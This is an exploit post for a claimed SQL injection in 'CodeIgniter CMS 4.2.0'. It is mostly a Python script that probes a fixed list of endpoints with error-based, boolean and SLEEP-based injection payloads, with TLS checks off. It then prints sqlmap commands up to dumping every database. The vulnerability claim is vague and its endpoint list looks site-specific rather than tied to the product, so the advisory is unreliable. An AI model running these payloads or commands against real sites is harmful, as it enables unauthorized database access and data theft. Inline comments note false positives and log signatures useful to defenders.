=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167893/
[+] Summary :
Multiple SQL injection vulnerabilities exist in CodeIgniter CMS version 4.2.0.
The vulnerabilities affect various endpoints and parameters,
allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database.
Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.
Note that this summary does not name the affected parameters or code; the only concrete detail is the endpoint list in the script below, which sends GET requests only.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters
"""
import requests
import sys
import urllib3
import time
from argparse import ArgumentParser
# Silence urllib3's InsecureRequestWarning. Every request in this script is
# sent with verify=False, so TLS certificates are never validated, and with
# this call that is no longer reported at runtime.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class CodeIgniterExploit:
    """Probe a fixed list of URL paths on one site for SQL injection signals.

    Three heuristics are used, all over GET requests with TLS verification
    switched off: database error text after a trailing single quote, a body
    difference between an always-true and an always-false condition, and a
    response delay after a SLEEP(5) payload. None of them proves injection
    on its own; each has an obvious false-positive path noted on the method.

    For defenders, the request shapes are fixed strings (a trailing `'`,
    `' AND '1'='1` / `' AND '1'='2` pairs, `' AND SLEEP(5)--`) sent with one
    constant header set, so they are easy to match in web-server or WAF logs.
    The durable fix for this bug class is bound query parameters rather than
    input filtering.
    """

    def __init__(self, target):
        """Remember the base URL and prepare the shared HTTP session.

        Args:
            target: Base URL of the site. Trailing slashes are removed so the
                endpoint paths can be appended directly.
        """
        self.target = target.rstrip('/')
        self.session = requests.Session()
        # Constant browser-like header set sent with every request.
        browser_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        }
        self.session.headers.update(browser_headers)

    def check_vulnerability(self):
        """Request each known path with a trailing single quote and look for database error text.

        Returns:
            The list of endpoint strings whose response body contained one of
            the error markers (case-insensitive substring match).
        """
        print(f"[*] Checking vulnerability for: {self.target}")

        # NOTE(review): the list mixes .php and .asp URLs with framework-style
        # routes; these look site-specific rather than paths every install
        # exposes. Confirm before reading a hit as evidence of the advisory's issue.
        endpoints = [
            "/Job/searchResult/?title=123",
            "/Job/searchResult/?title=test",
            "/search.php?search=1",
            "/news.php?p=7251",
            "/employe/show.php?cvid=14088",
            "/login/",
            "/fa/index.asp?p=search&search=1",
            "/fa/FormView/1026",
            "/fa/formview/1030"
        ]
        # Plain substrings: a page that merely mentions "PostgreSQL" or
        # "syntax error" in its normal content is reported as a hit too.
        error_indicators = [
            "SQL syntax",
            "mysql_fetch",
            "mysql_num_rows",
            "ODBC Driver",
            "Unclosed quotation mark",
            "syntax error",
            "MySQL server",
            "Warning: mysql",
            "PostgreSQL",
            "ORA-",
            "Microsoft OLE DB"
        ]

        vulnerable_endpoints = []
        for endpoint in endpoints:
            # The quote lands at the very end of the URL: in the last query
            # value when there is a query string, otherwise in the path.
            test_url = f"{self.target}{endpoint}'"
            try:
                reply = self.session.get(test_url, timeout=10, verify=False)
                body = reply.text.lower()
                if any(marker.lower() in body for marker in error_indicators):
                    print(f"[+] SQL Injection found in: {endpoint}")
                    vulnerable_endpoints.append(endpoint)
            except Exception as e:
                # Any failure (connection, timeout, decoding) is reported and
                # the scan moves on to the next path.
                print(f"[-] Error testing {endpoint}: {e}")
        return vulnerable_endpoints

    def exploit_boolean(self, endpoint):
        """Compare the responses to an always-true and an always-false condition.

        Args:
            endpoint: Path (with optional query string) appended to the base URL.

        Returns:
            True when the two response bodies differ, False when they are
            equal or a request fails. Any page whose body changes between
            requests (timestamps, per-request tokens) is therefore reported
            as confirmed as well.
        """
        print(f"[*] Testing boolean-based SQLi on: {endpoint}")

        true_payload = f"{endpoint}' AND '1'='1"
        false_payload = f"{endpoint}' AND '1'='2"

        try:
            # Same request order as the comparison: true condition first.
            bodies = [
                self.session.get(f"{self.target}{payload}", timeout=10, verify=False).text
                for payload in (true_payload, false_payload)
            ]
        except Exception as e:
            print(f"[-] Boolean test failed: {e}")
            return False

        if bodies[0] == bodies[1]:
            return False
        print("[+] Boolean-based SQL Injection confirmed!")
        return True

    def exploit_time_based(self, endpoint):
        """Send a SLEEP(5) condition and measure how long the response takes.

        Args:
            endpoint: Path (with optional query string) appended to the base URL.

        Returns:
            True when the request took at least 5 seconds, False otherwise or
            on error. A server that is simply slow is reported as confirmed;
            a response slower than the 10-second timeout raises and yields False.
        """
        print(f"[*] Testing time-based SQLi on: {endpoint}")

        # SLEEP() is MySQL/MariaDB syntax; other engines will not delay on it.
        time_payload = f"{endpoint}' AND SLEEP(5)--"

        try:
            start_time = time.time()
            self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
            end_time = time.time()
        except Exception as e:
            print(f"[-] Time-based test failed: {e}")
            return False

        if end_time - start_time < 5:
            return False
        print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
        return True

    def generate_sqlmap_commands(self, endpoints):
        """Print sqlmap command lines for each endpoint; nothing is executed here.

        Args:
            endpoints: Iterable of endpoint strings to append to the base URL.
        """
        print("\n[+] SQLMap Commands:")
        print("=" * 60)

        for endpoint in endpoints:
            # The URL is placed between double quotes without any escaping.
            url = f"{self.target}{endpoint}"
            lines = (
                f"\n# For endpoint: {endpoint}",
                f'sqlmap -u "{url}" --batch --level=5 --risk=3',
                f'sqlmap -u "{url}" --batch --dbs',
                f'sqlmap -u "{url}" --batch --current-db',
                f'sqlmap -u "{url}" --batch --tables',
                f'sqlmap -u "{url}" --batch --dump-all',
            )
            for line in lines:
                print(line)

    def comprehensive_scan(self):
        """Run the error-based check, then both blind checks on every hit, then print sqlmap commands.

        Stops after the first step when no endpoint shows an error marker.
        The boolean and time-based results are printed by the helpers and not
        collected here.
        """
        print("[*] Starting comprehensive CodeIgniter CMS scan...")

        vulnerable_endpoints = self.check_vulnerability()
        if len(vulnerable_endpoints) == 0:
            print("[-] No SQL Injection vulnerabilities found")
            return

        print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")

        blind_checks = (self.exploit_boolean, self.exploit_time_based)
        for endpoint in vulnerable_endpoints:
            print(f"\n[*] Testing exploitation methods for: {endpoint}")
            for run_check in blind_checks:
                run_check(endpoint)

        self.generate_sqlmap_commands(vulnerable_endpoints)
def main():
    """Print the banner, parse the command line and run the selected mode.

    `-u/--url` is required. The mode flags are not mutually exclusive:
    `--check` takes precedence, then `--exploit`, then `--sqlmap`; with none
    of them set, the comprehensive scan runs.
    """
    banner = """
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
CodeIgniter CMS 4.2.0 SQL Injection Exploit
By: indoushka
"""
    print(banner)

    parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    mode_flags = (
        ('--check', 'Check vulnerability only'),
        ('--exploit', 'Run full exploitation'),
        ('--sqlmap', 'Generate sqlmap commands'),
    )
    for flag, help_text in mode_flags:
        parser.add_argument(flag, action='store_true', help=help_text)
    args = parser.parse_args()

    exploit = CodeIgniterExploit(args.url)

    if args.check:
        # Error-based check only; report a one-line verdict.
        vulnerable_endpoints = exploit.check_vulnerability()
        if not vulnerable_endpoints:
            print("\n[!] Target does not appear to be vulnerable")
        else:
            print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
        return

    if args.sqlmap and not args.exploit:
        # Error-based check, then print (not run) sqlmap command lines.
        vulnerable_endpoints = exploit.check_vulnerability()
        if not vulnerable_endpoints:
            print("[-] No vulnerable endpoints found for sqlmap")
        else:
            exploit.generate_sqlmap_commands(vulnerable_endpoints)
        return

    # --exploit, or no mode flag at all: comprehensive scan.
    exploit.comprehensive_scan()
# Script entry point: when run with no command-line arguments, print a short
# usage hint and exit with status 1; otherwise hand over to main().
# NOTE(review): the hint names codeigniter_exploit.py, while the advisory text
# above invokes the script as poc.py.
if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("Usage: python codeigniter_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================